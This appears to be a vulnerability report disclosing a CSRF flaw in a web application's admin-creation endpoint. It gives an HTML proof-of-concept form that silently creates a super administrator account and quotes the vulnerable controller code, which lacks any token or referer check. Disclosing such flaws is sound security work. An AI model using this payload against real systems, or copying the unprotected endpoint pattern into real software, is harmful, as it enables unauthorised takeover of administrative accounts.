There is a CSRF vulnerability that can add the administrator account (/system/admin/admin_save) #8
Description
The Add administrator Function is not check referer and token
PoC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/system/admin/admin_save" method="POST">
<input type="hidden" name="adminName" value="Diazrael" />
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="repassword" value="123456" />
<input type="hidden" name="nickName" value="Diazrael" />
<input type="hidden" name="roleId" value="272835742965968896" />
<input type="hidden" name="email" value="Diazrael@admin.com" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Problematic code:
//处理和保存管理员信息
@PostMapping("/admin_save")
@ResponseBody
public DataVo addAdminSave(@Valid Admin admin, BindingResult result){
DataVo data = DataVo.failure("操作失败");
try {
if (result.hasErrors()) {
List<ObjectError> list = result.getAllErrors();
for (ObjectError error : list) {
return DataVo.failure(error.getDefaultMessage());
}
return null;
}
data = adminService.addAdmin(admin);
} catch (Exception e) {
data = DataVo.failure(e.getMessage());
}
return data;
}A super administrator account has been added successfully
